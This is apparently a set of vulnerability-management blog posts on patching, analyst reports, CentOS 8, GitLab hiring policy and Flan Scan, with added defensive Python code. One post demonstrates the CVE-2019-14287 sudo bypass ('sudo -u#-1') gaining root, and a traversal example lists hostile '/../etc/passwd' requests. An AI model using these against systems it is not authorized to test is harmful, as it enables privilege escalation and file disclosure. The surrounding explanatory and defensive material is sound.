Due to the problems of automated Vulnerability Remediation, it seems that currently #VulnerabilityManagement and #PatchManagement vendors mainly focus on the hosts:
1) that are not very important, so the unsuccessful update won't become a complete disaster;
2) where the update operation is quite complicated.
It seems a bit foolish to offer automated remediation for systems where almost everything can be updated with a single command from #WSUS or a Linux repository. However, in the case of Linux, there will be software installed from source, self-built packages, and other complexities. And that's even without talking about #Docker.
So, it turns out that the most convenient option for vendors is to focus on Windows desktops. And not for all programs, but only for a specific list (clarify this to avoid surprises!).
Plus, the trigger and the responsibility are still in the hands of IT administrators.
Such "automated remediation" off-the-shelf solutions can be successfully presented on the market right now.
Adobe is deactivating all accounts and cancelling all subscriptions in Venezuela to comply with a U.S. Government Executive Order (issued with no expiration date). There will be no refunds! Yep, they block the accounts of ordinary people who bought the damn Photoshop. Isn't this an example of REAL piracy from well-known "piracy" fighters?
The sad reality is that even in the case of "private clouds", no one can be protected from such political decisions. Does this mean that import substitution and protectionism are good for the country and its people? Well, not really. I believe that only a free competitive market provides good products. But, as we can see, it may be practical. At least, it is much better than facing such unfriendly unilateral actions unprepared, without any alternatives.
It's a little bit sad that there are no more vendors with Russian roots in Gartner 2019 MQs for AST and WAF. #PositiveTechnologies were added in MQ for AST in 2018 and excluded in 2019 with a standard comment "were dropped based on our inclusion and exclusion criteria" (as well as SiteLock and Trustwave). Positive Technologies were also in MQ for WAF in 2017 and probably excluded in 2018 (I didn't track this one). Earlier in MQs were #ERPScan (AST MQ 2017) and #Wallarm (mentioned, but not included in WAF MQ 2017).
Do you need #CentOS8 with #IceWM as desktop Operating System? Most likely not. Especially if you want it to work smoothly without any worries and troubles. However, if you enjoy playing with new desktop environments, you might find it fun.
My reasons were as follows:
1. I wanted to use the same Linux distribution for server and desktop. Just to minimize possible surprises during the deployment.
2. I wanted to know what is going on in the RPM-based part of Linux world. The only way to achieve this is to use such distribution every day.
3. I was tired of problems with the VirtualBox guest additions in #CentOS 7 (yes, I run it all as a virtual machine), especially after the 3.10 kernel updates. It was time to move on.
4. I didn't want to use #Gnome3, because it's slow and ugly (however, it's fully functional!). And there were no other DEs in the CentOS 8 repositories at that time.
Read here: https://avleonov.com/2019/10/14/centos-8-with-icewm-desktop-environment/
A nice, but not very practical bug in #sudo, CVE-2019-14287. Let's say I created a temp user:
# useradd temp
# passwd temp
And in /etc/sudoers I forbade him to run /usr/bin/id as root:
temp ALL=(ALL, !root) /usr/bin/id
Then I log in as the temp user:
# su temp
I can run /usr/bin/id as the temp user:
$ /usr/bin/id
uid=1002(temp) gid=1002(temp) groups=1002(temp)
I can't run it as root with sudo:
$ sudo /usr/bin/id
Sorry, user temp is not allowed to execute '/usr/bin/id' as root on DESKTOP-DA27N5I.localdomain.
BUT if I set a special user id (-1 or 4294967295), I actually CAN run it as root with sudo (it's a bug!):
$ sudo -u#-1 /usr/bin/id
uid=0(root) gid=1002(temp) groups=1002(temp)
^- we see that it was really executed as root with uid 0.
Yep, this one is funny. CVE-2019-16278 is a fresh 0day RCE in the open-source #Nostromo web server (versions <= 1.9.6) through directory traversal. This bug is due to an incomplete fix for CVE-2011-0751: "we can bypass a check for /../". It was discovered 8 years (!!!) later. Ha!
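An added example for the sudo post above (my own code, not from the post or from the sudo project): a small audit that parses sudoers-style user specifications and flags rules whose Runas list is "ALL" minus some "!user" entries, which is exactly the shape of the temp rule above. On sudo builds affected by CVE-2019-14287 (fixed in sudo 1.8.28) that negation is what the -u#-1 trick bypassed, so these are the rules to list after an upgrade and, where possible, to rewrite as an explicit allow-list of Runas users. The sample sudoers text is constructed, and the parser only understands the plain "user HOST=(runas) commands" form; Defaults, aliases and include directives are skipped.

```python
import re
from typing import Dict, List

# Matches a user specification line of the form
#   user  HOST=(runas_users[:runas_groups])  commands
# This is a deliberately simplified subset of the sudoers grammar.
_SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$"
)
_SKIP_PREFIXES = ("Defaults", "@", "#include", "Cmnd_Alias", "User_Alias",
                  "Host_Alias", "Runas_Alias")


def parse_sudoers(text: str) -> List[Dict[str, str]]:
    """Return one dict (who, host, runas, cmds) per user-specification line."""
    specs = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#include"):      # keep include directives out of the comment strip
            continue
        line = line.split("#", 1)[0].strip()  # drop trailing comments
        if not line or line.startswith(_SKIP_PREFIXES):
            continue
        m = _SPEC_RE.match(line)
        if m:
            specs.append(m.groupdict())
    return specs


def runas_users(runas_field: str) -> List[str]:
    """Split the user part of '(users:groups)' into individual entries."""
    users = runas_field.split(":", 1)[0]
    return [u.strip() for u in users.split(",") if u.strip()]


def find_negated_runas(text: str) -> List[Dict[str, str]]:
    """Flag rules that grant ALL Runas users except some '!user' entries.

    Such rules depend on sudo honouring the negation; an explicit allow-list
    such as (postgres) does not have this weakness.
    """
    findings = []
    for spec in parse_sudoers(text):
        users = runas_users(spec["runas"])
        negated = [u for u in users if u.startswith("!")]
        if "ALL" in users and negated:
            findings.append({**spec, "negated": ",".join(negated)})
    return findings


# Constructed sample content (not a real /etc/sudoers); the temp rule is the one from the post.
SAMPLE_SUDOERS = """\
# sample file
Defaults    env_reset
root        ALL=(ALL:ALL) ALL
temp        ALL=(ALL, !root) /usr/bin/id
backup      ALL=(postgres) /usr/bin/pg_dump
"""

if __name__ == "__main__":
    for f in find_negated_runas(SAMPLE_SUDOERS):
        print(f"{f['who']} on {f['host']}: runas=({f['runas']}) "
              f"relies on negation of {f['negated']} for {f['cmds']}")
```

Run it against a copy of the real file (for example the output of `sudo cat /etc/sudoers` redirected to a file) rather than editing in place; the point is to find the rules to review, not to change them automatically.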
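An added example for the Nostromo note above (my own code, not the project's): the contrast between a literal "/../" substring test on the raw request string, which is the kind of check the post says was bypassed, and a resolver that percent-decodes the path once, normalizes it, and then verifies component-wise that the result is still under the document root. The DOCROOT value and all request paths are constructed for illustration; a real server should additionally resolve symlinks (os.path.realpath) on the candidate and repeat the containment check.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed document root for the examples (placeholder, not Nostromo's layout).
DOCROOT = "/var/www/htdocs"


def naive_is_safe(raw_request_path: str) -> bool:
    """A substring check on the undecoded request: the approach that gets bypassed."""
    return "/../" not in raw_request_path


def resolve_request_path(docroot: str, raw_request_path: str) -> Optional[str]:
    """Map a request path onto the document root, or return None if it escapes.

    1. percent-decode exactly once, so encoded dots become visible;
    2. reject NUL bytes, which C string handling would truncate on;
    3. drop any query string and normalize '.', '..' and repeated slashes;
    4. compare against the root as path components, so '/var/www/htdocs2'
       is not mistaken for something inside '/var/www/htdocs'.
    """
    decoded = unquote(raw_request_path)
    if "\x00" in decoded:
        return None
    decoded = decoded.split("?", 1)[0]
    root = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    # Constructed requests; the last one is an encoded form of the third.
    for req in ["/index.html", "/docs/../index.html", "/../etc/passwd", "/%2e%2e/etc/passwd"]:
        print(f"{req:25} naive={naive_is_safe(req)!s:5} resolved={resolve_request_path(DOCROOT, req)}")
```

The lexical check alone is enough to show the difference: the encoded request passes the substring test but is rejected once the path is decoded and normalized before comparison.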
What is better: homegrown custom Vulnerability Scanning automation or commercial Perimeter Scanning Service (Threat Intelligence Platform)?
There are two main issues that each Vulnerability Scanning vendor faces:
1. What to scan. If you (as a vendor) want to provide your Threat Intelligence feed automatically, you have to know what to scan without asking your customers. Even inside a big organization, where people can build integrations with various IT data sources, it's not so obvious what to scan! Of course, you can get some targets from known IP ranges, domain names, connected websites, etc. But, most likely, you will miss something important and/or add unrelated trash. Thus, there will be many false positives and false negatives in your report.
2. Actual scanning. You can make an aggressive full-scan and your scanner will be blocked or will affect the targets negatively. Or you can scan only the most popular ports and miss something important. In both cases, the scan result won't be good enough.
So, I stand for homegrown solutions that can be customized in different ways.
BUT I am also for constant comparisons with the commercial scanning services. Not because they will provide a better alternative (most likely not), but because they do things independently and differently. A simple diff with their results can show whether your process is good enough: maybe some domains are managed on a different DNS server and you don't see them, maybe some target hosts have already banned your scanner and you don't see their services, maybe some host scans fail because of timeouts and various anti-scan measures, etc. Anything can happen!
When you have alternative results, it's much easier to evaluate the quality of your own system and make changes.
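The "simple diff" from the post, as an added example (my own code, not from the post): two result sets, our own perimeter scan and an external service's, each reduced to host -> open ports, compared so that each discrepancy lands in the bucket that hints at its cause: hosts only the service knows (inventory or DNS gap on our side), hosts only we know (their gap, or noise in our target list), ports only the service saw, and hosts that answered nothing to us but something to them (a banned scanner or timeouts). Both result sets are constructed sample data.

```python
import json
from typing import Dict, Set

ScanResult = Dict[str, Set[int]]  # host -> set of open TCP ports

# Constructed sample results (not real hosts): our own scanner vs. an external service.
OWN_SCAN: ScanResult = {
    "www.example.test": {80, 443},
    "mail.example.test": {25, 587},
    "vpn.example.test": set(),        # host answered, but we saw no open ports
    "lab.example.test": {22},
}
SERVICE_SCAN: ScanResult = {
    "www.example.test": {80, 443, 8443},
    "mail.example.test": {25, 587},
    "vpn.example.test": {443},
    "old.example.test": {21, 80},     # host we did not have in our target list
}


def compare_scans(own: ScanResult, service: ScanResult) -> Dict[str, object]:
    """Bucket every discrepancy between the two scans by its likely cause."""
    own_hosts, svc_hosts = set(own), set(service)
    report: Dict[str, object] = {
        "unknown_to_us": sorted(svc_hosts - own_hosts),       # inventory / DNS gap
        "unknown_to_service": sorted(own_hosts - svc_hosts),  # their gap or our noise
        "ports_we_missed": {},      # host -> ports only the service saw
        "ports_only_we_saw": {},    # host -> ports only we saw
        "silent_for_us": [],        # we saw nothing, they saw services: blocked or timed out?
    }
    for host in sorted(own_hosts & svc_hosts):
        missed = service[host] - own[host]
        extra = own[host] - service[host]
        if missed:
            report["ports_we_missed"][host] = sorted(missed)
        if extra:
            report["ports_only_we_saw"][host] = sorted(extra)
        if not own[host] and service[host]:
            report["silent_for_us"].append(host)
    return report


def has_findings(report: Dict[str, object]) -> bool:
    """True if any bucket is non-empty, i.e. the two scans disagree somewhere."""
    return any(bool(v) for v in report.values())


if __name__ == "__main__":
    print(json.dumps(compare_scans(OWN_SCAN, SERVICE_SCAN), indent=2))
```

In practice the two inputs come from exporting your own scanner's results and the service's report into the same host -> ports shape; the buckets are what you then chase down, and "ports_only_we_saw" is the one that may indicate unrelated trash in your own target list rather than a gap on their side.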
I just read the 14-page report, "Comparing vulnerability and security configuration assessment coverage of leading VM vendors" by Principled Technologies. Tenable marketing team actively shared it last week.
The main idea of the report: Tenable covers more CVEs and CIS benchmarks than Qualys and Rapid7.
So, my impressions:
1. Hallelujah! Finally, a comparison of Vulnerability Management products based on something measurable - on their Knowledge Bases. And at least one VM vendor is not afraid to use it in marketing and mentions the competitors directly. This is a huge step forward and I hope that this is the beginning of something more serious. We really need to start talking more about the core functionality of VM products.
2. However, this particular report is just a Tenable advertisement. This is not even hidden. I really like Nessus and Tenable, and believe that they have a very good Knowledge Base, but reading on every page how great Tenable's products are is just ridiculous. It would be much better to read it in a more neutral form.
3. Using only CVE IDs for comparing Vulnerability Knowledge Bases is NOT correct (strictly speaking), because for many software products most vulnerabilities do not have CVEs, only patch IDs. A CVE-based comparison also doesn't distinguish types of vulnerability checks: remote banner-based, remote exploit-based and local. To make a reliable comparison, it's necessary to map all existing vulnerability detection plugins of the VM products, but this is MUCH more difficult.
4. The CVE-based comparison in this report is not really informative. They only compare absolute numbers of IDs, grouping them by year, software product (CPE) and CVSS v2 score. Why is this wrong? If VM vendor A covers 1000 CVEs and vendor B covers 1000 CVEs, this does not mean that they have the same database and that it is quite complete. The real intersection between the KBs may be only 500 IDs, so these vendors would be able to detect only half of each other's vulnerabilities. It matters, right? In my old express comparison of the Nessus and OpenVAS Knowledge Bases I demonstrated this and tried to suggest reasons why some vulnerabilities are covered by one vendor and not by others. If you compare CVEs as sets of objects, it turns out that each VM product has its own advantages and disadvantages.
5. The CIS-based comparison in this report uses only information about certified implementations from the CIS website, without regard to versions and levels. CIS Certification is an expensive and complicated procedure that is NOT mandatory and does not affect anything. I once implemented many CIS standards for Linux/Unix in PT MaxPatrol. Well, yes, they are not certified and you won't see them on the CIS website, but does this mean that they are not supported in the VM/CM product? Of course not! So, it's a very strange way of comparing Compliance Management capabilities.
In conclusion, the idea behind this report is good, but the implementation is rather disappointing. If one of the VM vendors, researchers or customers wants to make a similar comparison, public or private, but in a much more reliable and fair way, contact me; I will be glad to take part in this.
#PrincipledTechnologies #Tenable #Rapid7 #Qualys #CVE #CIS #VulnerabilityManagement #ComplianceManagement #CPE #CVSS #PositiveTechnologies #MaxPatrol #OpenVAS #Nessus
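The set-based comparison from point 4, as an added example (my own code, not from the report or the post): two Knowledge Bases reduced to CVE ID sets, compared as sets rather than as counts. The sample sets are constructed so that the per-year totals of both vendors are identical, which is what a count-by-year table would show, while the overlap is only partial, which is what the report's method cannot show. Besides the intersection it reports the share of each vendor's IDs the other could detect and the Jaccard similarity, and it validates the ID format so a typo in an export does not silently shrink a set.

```python
import re
from typing import Dict, Set

CVE_RE = re.compile(r"^CVE-(?P<year>\d{4})-\d{4,}$")

# Constructed sample Knowledge Bases (CVE IDs only, as in the report's method).
VENDOR_A: Set[str] = {
    "CVE-2017-0144", "CVE-2017-5638", "CVE-2018-11776",
    "CVE-2019-0708", "CVE-2019-11043", "CVE-2019-14287",
}
VENDOR_B: Set[str] = {
    "CVE-2017-0144", "CVE-2017-7494", "CVE-2018-7600",
    "CVE-2019-0708", "CVE-2019-14287", "CVE-2019-16278",
}


def validate(ids: Set[str]) -> Set[str]:
    """Reject anything that is not a well-formed CVE ID instead of dropping it silently."""
    bad = sorted(i for i in ids if not CVE_RE.match(i))
    if bad:
        raise ValueError(f"malformed CVE IDs: {bad}")
    return ids


def year_of(cve_id: str) -> str:
    return CVE_RE.match(cve_id)["year"]


def compare_kbs(a: Set[str], b: Set[str]) -> Dict[str, object]:
    """Compare two CVE sets as sets, overall and per year."""
    a, b = validate(a), validate(b)
    both, union = a & b, a | b
    per_year: Dict[str, Dict[str, int]] = {}
    for year in sorted({year_of(i) for i in union}):
        ay = {i for i in a if year_of(i) == year}
        by = {i for i in b if year_of(i) == year}
        per_year[year] = {"a": len(ay), "b": len(by), "both": len(ay & by)}
    return {
        "count_a": len(a),
        "count_b": len(b),
        "both": len(both),
        "only_a": sorted(a - b),
        "only_b": sorted(b - a),
        "jaccard": len(both) / len(union) if union else 1.0,
        "share_of_b_covered_by_a": len(both) / len(b) if b else 1.0,
        "share_of_a_covered_by_b": len(both) / len(a) if a else 1.0,
        "per_year": per_year,
    }


if __name__ == "__main__":
    result = compare_kbs(VENDOR_A, VENDOR_B)
    print(f"A: {result['count_a']} IDs, B: {result['count_b']} IDs, "
          f"common: {result['both']}, Jaccard: {result['jaccard']:.2f}")
    for year, row in result["per_year"].items():
        print(f"  {year}: A={row['a']} B={row['b']} both={row['both']}")
    print("only A:", result["only_a"])
    print("only B:", result["only_b"])
```

With real exports the interesting output is "only_a" and "only_b" grouped by product, since that is where the reasons for the differences (missing local checks, no banner for a product, a vendor that tracks patch IDs instead of CVEs) start to show.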
Yep, it's been a while since the last update. But I'm still working on Zbrunk and think this project is very important. It got stuck a bit, but I hope to make small commits every evening. I also changed the priorities. Now I think it would be better not to integrate with Grafana, but to create our own dashboards and GUI. To begin with, I created a simple interface for searching (and deleting) events. #flask #vuejs #zbrunk
It's becoming a good tradition to share my impressions about the Forrester Wave "Vulnerability Risk Management" report (here is the one for Q1 2018). You can download a free reprint for Q4 2019 from the Tenable website. This time I even edited the illustration a bit. I tried to show how the positions of vendors changed, and which were added or removed. Please note that this is not official, it's just an extra layer that I added for fun.
What I liked:
The report has become much more adequate than last year. The traditional VM Big Three (Qualys, Tenable and Rapid7) are leaders. Stagnant VM vendors have been downgraded or completely removed from the report. This is probably due to new and more adequate inclusion criteria: "product improvements over the last two years", "annual product revenue greater than $10 million", "VRM product was responsible for over 50% of their total revenue", "at least 100 enterprise customers", etc.
What I did NOT like (and this hasn't changed much since last year):
1. The main slogan of this report is "Prioritization And Reporting Are Key Differentiators". According to Forrester, Risk Prioritization is based on measuring vulnerabilities, assets and network segments. Well, I agree that Risk Prioritization is important. BUT (!) only when your Vulnerability Detection is perfect. This is clearly not the case at the moment! For proper Risk Prioritization it's necessary to understand the limitations of Vulnerability Scanners and how to obtain data for Asset and Network classification. Unfortunately, this report doesn't pay much attention to the core functionality of VM products; it focuses on GUI, reports and high-level marketing features. "Vulnerability enumeration" is only 15% of the overall weighting. It's really sad.
2. Profile descriptions are based on marketing materials from vendors (BTW, such an extract might be quite useful), and on some user quotes. These users also write about the reports and prioritization, like "custom reporting on individual business units was cumbersome" and "customers appreciate the new UI and strong reporting capabilities". It seems these users don't have (don't see/don't want to discuss) other problems.
3. Forrester mixes products that actually scan the network hosts with products that only analyze imported data, perimeter-only services (why not add over 9000 ASV scanners then?) and scan services with a "dedicated security specialist". The authors even write several times that some products "cannot be treated as a proper vulnerability management tool", so why include them in the report?
In any case, the report was better than last year. I hope Forrester will make separate reports for the tools that actually detect vulnerabilities and the tools that only aggregate and prioritize vulnerabilities. It would also be great to change the inclusion criteria and add smaller and more local VM vendors.
#Forrester #Brinqa #DigitalDefense #Expanse #KennaSecurity #NopSec #Outpost24 #Qualys #Rapid7 #RedSeal #RiskIQ #RiskSense #SkyboxSecurity #Tenable #BeyondSecurity #Tripwire #Symantec #BeyondTrust #IBM
Vulnerability Management and more
BTW, do you think there will be a new massive malware attack soon similar to WannaCry, but with the use of latest RDP RCE vulnerability (CVE-2019-0708)? Let's say during next 30 days.
Well, it's nice to recall this poll from May. It took ~6 months for #BlueKeep (CVE-2019-0708) to get a commercial exploit, then a free public exploit, and finally a first sample of malware that uses this vulnerability to deliver a Monero cryptocurrency miner. Of course, this is not comparable to the WannaCry epidemic, and this malware seems to be successful mainly in BSODing RDP honeypots, but still.
What a crazy paranoid world we live in! Gitlab published the news that they will not hire people from Russia and China (by country-of-residence). At least for positions with access to sensitive data.
Eric Johnson, VP of Engineering at GitLab, calls this "a common practice in our industry in the current geopolitical climate". And the choice of only 2 countries is based on "concerns of several customers".
I am sure that #GitLab is not the only company with such country-of-residence block. But this is one of the few cases when it's discussed openly. I especially recommend to read several comments of Candice Ciresi, Director of Global Risk and Compliance at GitLab, in the thread where she criticizes this decision from both formal and rational points of view.
As for my opinion, I find absolutely ridiculous the idea that such measures will help protect the company from insiders (who can somehow be pressured by a state).
Anyone can be pressured. User siziyman commented in the thread: "I hope you do realize that there's no need for an individual to be living within a certain state's borders for that state to apply pressure to them, as long as they have family/friends or anyone/anything left to lose in that country. So if that is the concern to address, you'd have to discriminate by nationality (or even history of one's movement across countries - I do know American citizens who lived or still live in Russia, have friends or family there)."
This is a Pandora's box. Today we see country-of-residence restrictions; tomorrow it will be country-of-origin restrictions or the fact that you have relatives in some wrong country, etc.
What if such a policy were applied everywhere? User jas88 commented: "Next week, the Chinese government would like a partition staffed only by Chinese nationals; the week after that, we get a European bank wanting 'EEA nationals only' for over-zealous GDPR compliance..."
I would like to see such data privacy problems solved technically. For example, with User Behaviour Analytics and Data Leakage Protection. The idea that you can eliminate the risk simply by not hiring people from some countries is stupid and unprofessional. But of course, GitLab has the right to do this.
BTW, don't use GitLab. Use Atlassian Bitbucket instead.
#GitHub recently introduced some great initiatives to improve the security of open-source products and libraries. They provided free access to CodeQL code analysis solution, created the global security research community GitHub Security Lab, became the CVE Numbering Authority (CNA) and provided a new way to apply for the CVE id directly from the GitHub interface. Moreover, they will automatically inform the affected projects if a vulnerability is found in some dependencies and will even make a pull request to fix the problem! And they will also scan for leaked credential tokens. Lots of great stuff!
GitHub made their own CVE-based Vulnerability Database with good mapping to commits and affected packages. The only thing that is missing there is EXPLOITs.
And now the #Vulners Team makes it even better! Now you can search for GitHub advisories at Vulners and see the links to exploits in the results. For example, for CVE-2019-13234. Cool, right?
Another piece of news about #Vulners (such a day). The well-known CDN provider #Cloudflare has just released the open-source network vulnerability scanner Flan Scan. What does it use under the hood to detect vulnerabilities? Yep, Vulners.
"#FlanScan is a thin wrapper around #Nmap that converts this popular open source tool into a vulnerability scanner with the added benefit of easy deployment."
"We found that the 'vulners' script, available on NSE, mapped the detected services to relevant CVEs from a database, which is exactly what we needed."
"The vulners script works by making API calls to a service run by vulners.com which returns any known vulnerabilities for the given service."
Features:
* Easy Deployment and Configuration (#docker, #kubernetes)
* Pushing results to the Cloud (Google Cloud Storage Bucket or an S3 bucket)
* Actionable Reports
The PDF reports look pretty good by the way.
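As an added example (my own code, not Flan Scan's and not the vulners NSE script's): the step the post describes, turning the vulners script's per-service CVE list into something actionable. The parser reads Nmap's normal text output, assumed here to follow the layout I know from the vulners script (a "| vulners:" block per open port, a "cpe:/..." line, then tab-separated "id score url" rows with an optional "*EXPLOIT*" marker), and the summary gives, per port, the matched CPE, the highest CVSS score, the number of CVEs and how many entries are exploits. The sample output is constructed; the EXPLOITPACK identifier in it is a placeholder.

```python
import re
from typing import Dict, List

PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+open\s+(?P<service>\S+)")
HEADER_RE = re.compile(r"^\|_?\s*(?P<script>[\w-]+):\s*$")          # "| vulners:" etc.
CPE_RE = re.compile(r"^\|\s+(?P<cpe>cpe:/\S+?):?\s*$")
ENTRY_RE = re.compile(
    r"^\|[_ ]\s+(?P<id>\S+)\s+(?P<score>\d+(?:\.\d+)?)\s+(?P<url>\S+)"
    r"(?:\s+(?P<flag>\*EXPLOIT\*))?\s*$"
)

# Constructed sample of Nmap normal output with the vulners script (tabs as in the real output).
SAMPLE_OUTPUT = """\
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:7.4:
|     \tCVE-2018-15473\t5.0\thttps://vulners.com/cve/CVE-2018-15473
|     \tEXPLOITPACK:EXAMPLE0001\t5.8\thttps://vulners.com/exploitpack/EXPLOITPACK:EXAMPLE0001\t*EXPLOIT*
|_    \tCVE-2017-15906\t5.0\thttps://vulners.com/cve/CVE-2017-15906
80/tcp open  http    Apache httpd 2.4.6
| http-server-header: Apache/2.4.6
| vulners:
|   cpe:/a:apache:http_server:2.4.6:
|_    \tCVE-2017-7679\t7.5\thttps://vulners.com/cve/CVE-2017-7679
"""


def parse_nmap_vulners(text: str) -> List[Dict[str, object]]:
    """Return one finding per vulners row: port, service, cpe, id, cvss, url, is_exploit."""
    findings: List[Dict[str, object]] = []
    port = service = cpe = None
    in_vulners = False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:                                   # new port: reset script state
            port, service = f"{m['port']}/{m['proto']}", m["service"]
            in_vulners, cpe = False, None
            continue
        if not line.startswith("|"):            # left the script output area
            in_vulners = False
            continue
        h = HEADER_RE.match(line)
        if h:                                   # another NSE script's block starts
            in_vulners = h["script"] == "vulners"
            continue
        if not in_vulners:
            continue
        e = ENTRY_RE.match(line)
        if e:
            findings.append({
                "port": port, "service": service, "cpe": cpe,
                "id": e["id"], "cvss": float(e["score"]), "url": e["url"],
                "is_exploit": e["flag"] is not None,
            })
            continue
        c = CPE_RE.match(line)
        if c:
            cpe = c["cpe"]
    return findings


def summarize(findings: List[Dict[str, object]]) -> Dict[str, Dict[str, object]]:
    """Per port: CPE, highest CVSS score, number of CVE rows and number of exploit rows."""
    per_port: Dict[str, Dict[str, object]] = {}
    for f in findings:
        s = per_port.setdefault(f["port"], {
            "service": f["service"], "cpe": f["cpe"],
            "max_cvss": 0.0, "cves": 0, "exploits": 0,
        })
        s["max_cvss"] = max(s["max_cvss"], f["cvss"])
        if str(f["id"]).startswith("CVE-"):
            s["cves"] += 1
        if f["is_exploit"]:
            s["exploits"] += 1
    return per_port


if __name__ == "__main__":
    for port, s in summarize(parse_nmap_vulners(SAMPLE_OUTPUT)).items():
        print(f"{port} {s['service']} {s['cpe']}: max CVSS {s['max_cvss']}, "
              f"{s['cves']} CVEs, {s['exploits']} exploit entries")
```

Feeding it real output means running Nmap with version detection and the vulners script (`nmap -sV --script vulners` against your own hosts) and passing the saved text to the parser; the "exploits" column is what makes the per-port list actionable, which is the gap the post points out for GitHub's database.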